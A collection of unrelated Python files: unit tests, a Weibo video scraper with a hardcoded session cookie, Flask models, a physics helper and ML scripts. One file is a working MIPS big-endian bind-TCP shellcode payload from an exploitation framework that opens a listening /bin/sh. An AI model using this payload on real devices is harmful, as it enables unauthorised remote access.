@pytest.mark.parametrize('email', [
'ckuehl@ocf.berkeley.edu',
'somebody@gmail.com',
'herp.derp-hello+something@berkeley.edu',
])
def test_valid_email(self, email):
validate_email(email)
@pytest.mark.parametrize('email', [
'',
'@',
'hello@hello',
'some kinda email@gmail.com',
])
def test_invalid_email(self, email):
with pytest.raises(ValidationError):
validate_email(email)
class TestValidatePassword:
@pytest.mark.parametrize('password', [
'correct horse battery staple',
'pogjpaioshfoasdfnlka;sdfi;sagj',
'ixChytH2GJYBcTZd',
])
def test_valid_password(self, password):
validate_password('ckuehl', password)
@pytest.mark.parametrize('password', [
'',
'simple',
'p@ssw0rd',
'correct horse\nbattery staple',
'correct horse battery staple é',
])
def test_invalid_password(self, password):
with pytest.raises(ValidationError):
validate_password('ckuehl', password)
@pytest.yield_fixture
def fake_credentials(mock_rsa_key):
yield AccountCreationCredentials(
encryption_key=mock_rsa_key,
mysql_uri='sqlite://', # heh
kerberos_keytab='/nonexist',
kerberos_principal='create/admin',
redis_uri='redis://create',
)
@pytest.yield_fixture
def mock_valid_calnet_uid():
with mock.patch(
'ocflib.account.search.user_attrs_ucb',
return_value={'berkeleyEduAffiliations': ['STUDENT-TYPE-REGISTERED']}
):
yield
@pytest.yield_fixture
def mock_invalid_calnet_uid():
with mock.patch(
'ocflib.account.search.user_attrs_ucb',
return_value={'berkeleyEduAffiliations': ['STUDENT-STATUS-EXPIRED']},
):
yield
class TestValidateRequest:
def test_valid_request(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
session,
):
assert validate_request(
fake_new_account_request,
fake_credentials,
session,
) == ([], [])
@pytest.mark.parametrize('attrs', [
{'user_name': 'ckuehl'},
])
def test_invalid_request_error(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
attrs,
session,
):
errors, warnings = validate_request(
fake_new_account_request._replace(**attrs),
fake_credentials,
session,
)
assert errors
def test_invalid_request_already_submitted(
self,
fake_new_account_request,
fake_credentials,
mock_valid_calnet_uid,
session,
):
# test where username has already been requested
with mock.patch('ocflib.account.submission.username_pending', return_value=True):
errors, warnings = validate_request(
fake_new_account_request,
fake_credentials,
session,
)
assert errors
# test where this user (calnet/callink oid) has already submitted a request
with mock.patch('ocflib.account.submission.user_has_request_pending', return_value=True):
errors, warnings = validate_request(
fake_new_account_request,
fake_credentials,
session,
)
assert errors
class TestCreateAccount:
@pytest.mark.parametrize('is_group,calnet_uid,callink_oid,expected', [
(False, 123456, None, {'calnetUid': 123456}),
(True, None, 123456, {'callinkOid': 123456}),
])
def test_create(
self,
is_group,
calnet_uid,
callink_oid,
expected,
fake_new_account_request,
fake_credentials
):
with mock.patch('ocflib.account.creation.create_kerberos_principal_with_keytab') as kerberos, \
mock.patch('ocflib.account.creation.get_kerberos_principal_with_keytab',
return_value=None) as kerberos_get, \
mock.patch('ocflib.account.creation.create_ldap_entry') as ldap, \
mock.patch('ocflib.account.creation.create_home_dir') as home_dir, \
mock.patch('ocflib.account.creation.ensure_web_dir') as web_dir, \
mock.patch('ocflib.account.creation.send_created_mail') as send_created_mail, \
mock.patch('ocflib.account.creation._get_first_available_uid', return_value=42) as get_uid, \
mock.patch('ocflib.account.creation.call') as call, \
freeze_time('2015-08-22 14:11:44'):
fake_new_account_request = fake_new_account_request._replace(
is_group=is_group,
calnet_uid=calnet_uid,
callink_oid=callink_oid,
)
new_uid = create_account(
fake_new_account_request,
fake_credentials,
mock.MagicMock(),
known_uid=1,
)
assert new_uid == 42
get_uid.assert_called_once_with(1)
kerberos_get.assert_called_once_with(
fake_new_account_request.user_name,
fake_credentials.kerberos_keytab,
fake_credentials.kerberos_principal,
)
kerberos.assert_called_once_with(
fake_new_account_request.user_name,
fake_credentials.kerberos_keytab,
fake_credentials.kerberos_principal,
password='hunter20000000',
)
ldap.assert_called_once_with(
'uid=someuser,ou=People,dc=OCF,dc=Berkeley,dc=EDU',
dict({
'cn': ['Some User'],
'gidNumber': 1000,
'objectClass': ['ocfAccount', 'account', 'posixAccount'],
'uidNumber': 42,
'homeDirectory': '/home/s/so/someuser',
'loginShell': '/bin/bash',
'ocfEmail': 'someuser@ocf.berkeley.edu',
'mail': ['some.user@ocf.berkeley.edu'],
'userPassword': '{SASL}someuser@OCF.BERKELEY.EDU',
'creationTime': datetime.now(timezone.utc).astimezone(),
}, **expected),
keytab=fake_credentials.kerberos_keytab,
admin_principal=fake_credentials.kerberos_principal,
)
call.assert_called_once_with(('sudo', 'nscd', '-i', 'passwd'))
home_dir.assert_called_once_with(fake_new_account_request.user_name)
web_dir.assert_called_once_with(fake_new_account_request.user_name)
send_created_mail.assert_called_once_with(fake_new_account_request)
|
import unittest
from backend.settings import config, template
class ConfigCorrectTest(unittest.TestCase):
def test_keys_match(self):
self.assertListEqual(list(config.keys()), list(template.keys()),
"Config and its template must have the same keys!")
def test_config_values_filled(self):
config_values = self.__get_nested_dict_values(config)
for val in config_values:
if val is None:
self.fail("Empty values are not allowed in config!")
@staticmethod
def __get_nested_dict_values(d):
for v in d.values():
if isinstance(v, dict):
yield from ConfigCorrectTest.__get_nested_dict_values(v)
else:
yield v
|
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import pytest
import itertools
from syne_tune.optimizer.schedulers.hyperband import HyperbandScheduler
from syne_tune.optimizer.schedulers.fifo import FIFOScheduler
from syne_tune.optimizer.schedulers.synchronous.hyperband_impl import (
SynchronousGeometricHyperbandScheduler,
)
from syne_tune import Tuner
from syne_tune import StoppingCriterion
from syne_tune.config_space import randint
from syne_tune.util import script_checkpoint_example_path
from tst.util_test import temporary_local_backend
_async_parameterizations = list(
itertools.product(
["fifo", "hyperband_stopping", "hyperband_promotion"],
["random", "bayesopt"],
["min", "max"],
)
)
@pytest.mark.parametrize("scheduler, searcher, mode", _async_parameterizations)
def test_async_scheduler(scheduler, searcher, mode):
max_steps = 5
num_workers = 2
random_seed = 382378624
config_space = {
"steps": max_steps,
"width": randint(0, 20),
"height": randint(-100, 100),
"sleep_time": 0.001,
}
entry_point = str(script_checkpoint_example_path())
metric = "mean_loss"
trial_backend = temporary_local_backend(entry_point=entry_point)
search_options = {"debug_log": False, "num_init_random": num_workers}
if scheduler == "fifo":
myscheduler = FIFOScheduler(
config_space,
searcher=searcher,
search_options=search_options,
mode=mode,
metric=metric,
random_seed=random_seed,
)
else:
prefix = "hyperband_"
assert scheduler.startswith(prefix)
sch_type = scheduler[len(prefix) :]
myscheduler = HyperbandScheduler(
config_space,
searcher=searcher,
search_options=search_options,
max_t=max_steps,
type=sch_type,
resource_attr="epoch",
random_seed=random_seed,
mode=mode,
metric=metric,
)
stop_criterion = StoppingCriterion(max_wallclock_time=0.2)
tuner = Tuner(
trial_backend=trial_backend,
scheduler=myscheduler,
sleep_time=0.1,
n_workers=num_workers,
stop_criterion=stop_criterion,
)
tuner.run()
_sync_parameterizations = list(
itertools.product(["random", "bayesopt"], ["min", "max"])
)
@pytest.mark.parametrize("searcher, mode", _sync_parameterizations)
def test_sync_scheduler(searcher, mode):
max_steps = 5
num_workers = 2
random_seed = 382378624
config_space = {
"steps": max_steps,
"width": randint(0, 20),
"height": randint(-100, 100),
"sleep_time": 0.001,
}
entry_point = str(script_checkpoint_example_path())
metric = "mean_loss"
trial_backend = temporary_local_backend(entry_point=entry_point)
search_options = {"debug_log": False, "num_init_random": num_workers}
myscheduler = SynchronousGeometricHyperbandScheduler(
config_space,
searcher=searcher,
search_options=search_options,
mode=mode,
metric=metric,
resource_attr="epoch",
max_resource_attr="steps",
random_seed=random_seed,
)
stop_criterion = StoppingCriterion(max_wallclock_time=0.2)
tuner = Tuner(
trial_backend=trial_backend,
scheduler=myscheduler,
sleep_time=0.1,
n_workers=num_workers,
stop_criterion=stop_criterion,
)
tuner.run()
|
#热门推荐(纪录片,评测,娱乐都没有)
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/video/aj/load?ajwvr=6&page=2&type=channel&hot_recommend_containerid=video_tag_15&__rnd=1584096137063'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
print(rectext)
num = re.sub(r'\\n', "", rectext)
num = re.sub(r'\\', "", num)
print(num)
soup = BeautifulSoup(num, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
print(len(list))
for index in range(len(list)):
#soup = BeautifulSoup(list[index], 'html.parser')
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
#q = videosource
imgsrc = list[index].find('img')
imgsrc = imgsrc['src']
title = list[index]['action-data']
str1 = title.find('&title=')
str2 = title.find('&uid=')
title = title[str1+7:str2]
title = urllib.parse.unquote(title,encoding='utf-8',errors='replace')
print(title)
print('http:' + imgsrc[6:])
print('http:' + mp4[0])
print('*******'*30)
#编辑推荐
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=channel&first_level_channel_id=4453781547450385&broadcast_id=4476916414218244'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
print(title.text)
print(img)
print('http:' + mp4[len(mp4)-1])
#排行榜
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=dayrank'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_a')
for index in range(len(list)):
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
title = list[index].find('h3')
title = title.text
title = title.replace(' ', '').replace('\n','')
if len(title) > 40:
title = title[:40] + '...'
print(title)
print(img)
print('http:' + mp4[len(mp4)-1])
#故事
import json
import requests
import re
from bs4 import BeautifulSoup
import urllib
url = 'https://weibo.com/tv?type=story'
cookies = dict(SUB='_2AkMpN-raf8NxqwJRmfoXxGniZIl_ygvEieKfaxsBJRMxHRl-yj92qhFTtRB6ArfENQBVM_xipNLvZYca4pNo4lw7p9Xi')
headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'}
rec = requests.get(url,headers=headers,cookies=cookies)
rec.encoding = 'utf-8'
rectext = rec.text
#print(rectext)
soup = BeautifulSoup(rectext, 'html.parser')
list = soup.find_all('div',class_='V_list_b')
for index in range(len(list)):
#print(list[index])
if list[index]['action-data'][:9] != 'type=live':
videosource = list[index]['video-sources']
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = urllib.parse.unquote(videosource,encoding='utf-8',errors='replace')
videosource = videosource[8:]
mp4 = videosource.split('http:')
img = list[index].find('img')
img = img['src']
if img[0:4] == 'http':
img = 'http' + img[5:]
else:
img = 'http:' + img
like = list[index].find('div',class_='like')
like = like.text
likenum = re.findall(r'\d+',like)
print(str(likenum[0] + '赞'))
print(img)
print('http:' + mp4[len(mp4)-1])
else:
index = index +1
|
import ssl
import pytest
import httpx
@pytest.mark.asyncio
async def test_load_ssl_config():
ssl_config = httpx.SSLConfig()
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_verify_non_existing_path():
ssl_config = httpx.SSLConfig(verify="/path/to/nowhere")
with pytest.raises(IOError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_verify_existing_file():
ssl_config = httpx.SSLConfig(verify=httpx.config.DEFAULT_CA_BUNDLE_PATH)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_verify_directory():
path = httpx.config.DEFAULT_CA_BUNDLE_PATH.parent
ssl_config = httpx.SSLConfig(verify=path)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_cert_and_key(cert_pem_file, cert_private_key_file):
ssl_config = httpx.SSLConfig(cert=(cert_pem_file, cert_private_key_file))
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
@pytest.mark.parametrize("password", [b"password", "password"])
async def test_load_ssl_config_cert_and_encrypted_key(
cert_pem_file, cert_encrypted_private_key_file, password
):
ssl_config = httpx.SSLConfig(
cert=(cert_pem_file, cert_encrypted_private_key_file, password)
)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_REQUIRED
assert context.check_hostname is True
@pytest.mark.asyncio
async def test_load_ssl_config_cert_and_key_invalid_password(
cert_pem_file, cert_encrypted_private_key_file
):
ssl_config = httpx.SSLConfig(
cert=(cert_pem_file, cert_encrypted_private_key_file, "password1")
)
with pytest.raises(ssl.SSLError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_cert_without_key_raises(cert_pem_file):
ssl_config = httpx.SSLConfig(cert=cert_pem_file)
with pytest.raises(ssl.SSLError):
await ssl_config.load_ssl_context()
@pytest.mark.asyncio
async def test_load_ssl_config_no_verify():
ssl_config = httpx.SSLConfig(verify=False)
context = await ssl_config.load_ssl_context()
assert context.verify_mode == ssl.VerifyMode.CERT_NONE
assert context.check_hostname is False
def test_ssl_repr():
ssl = httpx.SSLConfig(verify=False)
assert repr(ssl) == "SSLConfig(cert=None, verify=False)"
def test_timeout_repr():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert repr(timeout) == "TimeoutConfig(timeout=5.0)"
timeout = httpx.TimeoutConfig(read_timeout=5.0)
assert (
repr(timeout)
== "TimeoutConfig(connect_timeout=None, read_timeout=5.0, write_timeout=None)"
)
def test_limits_repr():
limits = httpx.PoolLimits(hard_limit=100)
assert (
repr(limits) == "PoolLimits(soft_limit=None, hard_limit=100, pool_timeout=None)"
)
def test_ssl_eq():
ssl = httpx.SSLConfig(verify=False)
assert ssl == httpx.SSLConfig(verify=False)
def test_timeout_eq():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert timeout == httpx.TimeoutConfig(timeout=5.0)
def test_limits_eq():
limits = httpx.PoolLimits(hard_limit=100)
assert limits == httpx.PoolLimits(hard_limit=100)
def test_timeout_from_tuple():
timeout = httpx.TimeoutConfig(timeout=(5.0, 5.0, 5.0))
assert timeout == httpx.TimeoutConfig(timeout=5.0)
def test_timeout_from_config_instance():
timeout = httpx.TimeoutConfig(timeout=5.0)
assert httpx.TimeoutConfig(timeout) == httpx.TimeoutConfig(timeout=5.0)
|
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs of training')
parser.add_argument('--batch_size', type=int, default=64, help='size of the batches')
parser.add_argument('--lr', type=float, default=0.0002, help='adam: learning rate')
parser.add_argument('--b1', type=float, default=0.5, help='adam: decay of first order momentum of gradient')
parser.add_argument('--b2', type=float, default=0.999, help='adam: decay of first order momentum of gradient')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
parser.add_argument('--latent_dim', type=int, default=100, help='dimensionality of the latent space')
parser.add_argument('--img_size', type=int, default=28, help='size of each image dimension')
parser.add_argument('--channels', type=int, default=1, help='number of image channels')
parser.add_argument('--sample_interval', type=int, default=400, help='interval betwen image samples')
args = parser.parse_args()
return args
|
from setuptools import setup
from setuptools import find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name = 'calcmass',
version = '2.0',
description = 'A script to calculate the molecular mass of a chemical compound in g/mol with its chemical formula',
author = 'Manu Kondapaneni',
author_email = 'manukonda11@gmail.com',
url = 'https://github.com/konman2/Mass',
long_description=long_description,
long_description_content_type="text/markdown",
download_url = 'https://github.com/konman2/Mass/archive/2.0.tar.gz',
keywords = ['mass', 'chemical', 'compound','chemistry','element','calculator'],
install_requires=[
'argparse',
],
packages=find_packages(),
entry_points={
'console_scripts': [
'calcmass = calcmass.__main__:main'
],
}
)
|
from maza.core.exploit import *
from maza.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
BindTCPPayloadMixin,
)
class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "MIPSBE Bind TCP",
"description": "Creates interactive tcp bind shell for MIPSBE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.MIPSBE
def generate(self):
bind_port = utils.convert_port(self.rport)
return (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
b"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
b"\x24\x0e\xff\xfd" + # li t6,-3
b"\x01\xc0\x20\x27" + # nor a0,t6,zero
b"\x01\xc0\x28\x27" + # nor a1,t6,zero
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
b"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
b"\x30\x50\xff\xff" + # andi s0,v0,0xffff
b"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
b"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
b"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
b"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
b"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
b"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
b"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
b"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
b"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
b"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
b"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x0e\xff\xef" + # li t6,-17
b"\x01\xc0\x30\x27" + # nor a2,t6,zero
b"\x23\xa5\xff\xe0" + # addi a1,sp,-32
b"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
b"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x05\x01\x01" + # li a1,257
b"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
b"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x28\x05\xff\xff" + # slti a1,zero,-1
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
b"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
b"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
b"\x24\x11\xff\xfd" + # li s1,-3
b"\x02\x20\x88\x27" + # nor s1,s1,zero
b"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
b"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
b"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
b"\x01\x01\x01\x0c" + # syscall 0x40404
b"\x24\x10\xff\xff" + # li s0,-1
b"\x22\x31\xff\xff" + # addi s1,s1,-1
b"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
b"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
b"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
b"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
b"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
b"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
b"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
b"\x27\xa4\xff\xec" + # addiu a0,sp,-20
b"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
b"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
b"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
b"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
b"\x01\x01\x01\x0c" # syscall 0x40404
)
|
from flask_sqlalchemy import SQLAlchemy
# The rest of the initilization is in __init__.py
database = SQLAlchemy()
class User(database.Model):
uId = database.Column(database.Integer, primary_key = True, nullable = False)
username = database.Column(database.String(50), unique=True,nullable = False)
password = database.Column(database.String(200),nullable = True)
native_lang = database.Column(database.String(50))
report_status = database.Column(database.Integer)
ban_status = database.Column(database.Integer)
languages = database.relationship('Language', backref=database.backref('user', lazy=True))
def __repr__(self):
return '<User %r>' % self.username
class Language(database.Model):
uId = database.Column(database.Integer, database.ForeignKey('user.uId'), nullable = False, primary_key = True,)
language = database.Column(database.String(50), primary_key = True)
fluency = database.Column(database.Integer)
# Example of a language query
# Language.query.with_parent(user).filter(Language.language == 'French').all()
# Returns the results of "user's" Language where language = 'French'
class Room(database.Model):
roomId = database.Column(database.Integer(), primary_key = True, unique=True)
language = database.Column(database.String(50))
initiator = database.Column(database.String(50), nullable = True) # Change to uId if we can figure it out
receiver = database.Column(database.String(50), nullable = False)
initiatorFluency = database.Column(database.Integer())
receiverFluency = database.Column(database.Integer())
already_deleted = database.Column(database.Boolean(), default = False)
#Reporting database
class Report(database.Model):
report_id = database.Column(database.Integer, primary_key = True)
report_status = database.Column(database.Integer)
reporter = database.Column(database.String(50))
reportee = database.Column(database.String(50))
#Administrator
class Admin(database.Model):
uId = database.Column(database.Integer, primary_key = True, nullable = False)
username = database.Column(database.Integer(), unique=True)
password = database.Column(database.String(200))
def __repr__(self):
return '<Admin %r>' % self.username
|
import os
from moviepy.editor import VideoFileClip
from moviepy.editor import concatenate_videoclips
from .step import Step
from yt_concate.settings import OUTPUT_DIR
import logging
class EditVideo(Step):
def process(self, inputs, utils, data):
logger = logging.getLogger('record')
logger.warning('Editing final video...')
clips = []
if inputs['limit'] > len(data):
limit = len(data)
else:
limit = inputs['limit']
for found in data[:limit]:
s, e = self.parse_clip_time(found)
try:
clips.append(VideoFileClip(found.yt.get_video_filepath()).subclip(s, e))
except:
logger.error('Error happened while clip video:'+ found.yt.id)
final_clip = concatenate_videoclips(clips)
final_clip.write_videofile(os.path.join(OUTPUT_DIR, inputs["channel_id"]+'.mp4'))
return
def parse_clip_time(self,found):
start = found.caption_time[0]
end = found.caption_time[0] + found.caption_time[1]
return start, end
|
from deficrawler.dex import Dex
def test_protocol_entities():
uniswap = Dex(protocol="Uniswap", chain="Ethereum", version=2)
balancer = Dex(protocol="Balancer", chain="Ethereum", version=1)
assert(uniswap.supported_entities() == [
'swap', 'pool'])
assert(balancer.supported_entities() == [
'swap', 'pool'])
|
from kivy.vector import Vector
from parabox.structures import Collector
class ElasticCollissionProcessor(object):
"""Collission processor for elastic objects"""
@staticmethod
def process_collission(first, second):
"""Process collission for two elastic objects
:param first: first widget to check collission
:type first: parabox.behaviour.collidable.Collidable
:param second: second widget to check collission
:type second: parabox.behaviour.collidable.Collidable
"""
if first in Collector.get_collection('movable'):
base, additional = first, second
else:
base, additional = second, first
ElasticCollissionProcessor.clarify_collission_point(base, additional)
base.velocity, additional.velocity =\
ElasticCollissionProcessor.get_velocity_after_collission(
base, additional)
@staticmethod
def clarify_collission_point(first, second):
"""Correct collission point of two widgets
:param first: first collission widget
:type first: parabox.behaviour.collidable.Collidable
:param second: second collission widget
:type second: parabox.behaviour.collidable.Collidable
"""
temp_velocity = second.get_resistance_vector(first)
if temp_velocity == Vector(0, 0):
temp_velocity = Vector(1, 0)
initial_velocity = Vector(first.velocity)
first.velocity = temp_velocity
first.move(first)
while first.collide_widget(second) and second.collide_widget(first):
first.move(first)
first.velocity = -temp_velocity
first.move(first)
first.velocity = initial_velocity
@staticmethod
def get_velocity_after_collission(first, second):
"""Change velocities vectors after collission
:param first: first collission widget
:type first: parabox.behaviour.collidable.Collidable
:param second: second collission widget
:type second: parabox.behaviour.collidable.Collidable
:returns: velocities vectors
:rtype: set
"""
collission_vector_x = second.get_resistance_vector(first)
v1, v2 = first.velocity, second.velocity
system_speed = Vector(v2)
v1, v2 = Vector(v1) - system_speed, Vector(v2) - system_speed
system_rotate_angle = Vector(1, 0).angle(collission_vector_x)
v1a, v1b = Vector(v1).rotate(system_rotate_angle)
mass_ratio = 0 if not second.mass else first.mass / second.mass
u1a_1, u1a_2 = ElasticCollissionProcessor.solve_quadratic_equation(
a=mass_ratio + 1,
b=-2 * mass_ratio * v1a,
c=(mass_ratio - 1) * v1a ** 2)
u1a = u1a_1 if u1a_1 != v1a else u1a_2
u1b = v1b
u2a = mass_ratio * (v1a - u1a)
u2b = 0
u1 = Vector(u1a, u1b).rotate(-system_rotate_angle)
u2 = Vector(u2a, u2b).rotate(-system_rotate_angle)
u1, u2 = u1 + system_speed, u2 + system_speed
return u1, u2
@staticmethod
def solve_quadratic_equation(a, b, c):
"""Returns roots of quadratic equation
ax^2 + bx + c = 0
:return: roots of equation
:rtype: set
"""
D = b ** 2 - 4 * a * c
return (-b + D ** .5) / (2 * a), (-b - D ** .5) / (2 * a)
|
import os
import argparse
import numpy as np
import matplotlib.pyplot as plt
import datetime
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from torch.utils.tensorboard import SummaryWriter
import torchvision.utils as utils
parser = argparse.ArgumentParser(description='PyTorch Places3 Testing')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('model', metavar='MODEL',
help='path to model checkpoint')
def main():
global args
args = parser.parse_args()
print(args)
# Writer for Tensorboard
global writer
log_dir = "logs/test/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
writer = SummaryWriter(log_dir)
global device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Data loading code
testdir = os.path.join(args.data, 'test')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
test_data = datasets.ImageFolder(testdir, transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
]))
print(test_data.class_to_idx)
global classes
classes = {v: k for k, v in test_data.class_to_idx.items()}
print(classes)
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=16, shuffle=True,
num_workers=1, pin_memory=True)
# Load model
# model_file = 'checkpoint/alexnet_best.pth.tar'
model_file = args.model
model = models.__dict__['alexnet'](num_classes=3)
checkpoint = torch.load(model_file, map_location=lambda storage, loc: storage)
state_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}
model.load_state_dict(state_dict)
model.cuda()
model.eval()
# define loss function (criterion)
criterion = nn.CrossEntropyLoss().cuda()
# Testing
prec1 = test(test_loader, model, criterion)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
